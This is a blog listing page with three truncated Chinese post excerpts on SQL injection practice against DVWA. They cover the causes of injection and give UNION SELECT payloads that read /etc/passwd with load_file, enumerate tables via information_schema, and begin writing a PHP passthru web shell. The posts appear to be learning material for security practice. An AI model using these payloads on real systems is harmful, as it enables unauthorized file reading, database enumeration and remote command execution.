摘要:
上篇主要概述了查询一些常见表格的方法 这里在增加一些查询的方式 读取文件: 'union select null,load_file('/etc/passwd')-- 写入文件 结合上面,我们可以写入一个文件在目标路径 ' union select null,"<?php passthru($_GE 阅读全文
posted @ 2019-07-09 20:38
峰中追风
阅读(2615)
评论(0)
推荐(0)
摘要:
Mysql默认在数据库中存放一个"information_schema"的数据库 查看所有库的所有表 查看所有库的所有表 'union select table_name,table_schema from information_schema.tables--+ 这个过程可以结合hackbar工具 阅读全文
posted @ 2019-07-09 15:22
峰中追风
阅读(2658)
评论(1)
推荐(0)
摘要:
SQL注入的原因是因为服务器没有对 客户端数据进行判断,并且前端的数据是攻击者可以控制,攻击者就可以构造不同的语句对数据库进行任意操作 寻找SQL注入点方式: 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 还是基于DVWA,我们输 阅读全文
posted @ 2019-07-09 14:07
峰中追风
阅读(842)
评论(0)
推荐(0)
浙公网安备 33010602011771号